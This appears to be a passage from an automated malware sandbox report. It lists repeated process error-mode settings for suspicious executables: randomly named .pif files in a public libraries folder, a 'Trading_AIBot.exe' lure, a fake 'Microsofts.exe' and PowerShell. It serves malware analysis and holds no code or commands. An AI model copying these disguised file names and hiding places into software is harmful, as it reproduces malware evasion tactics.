Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
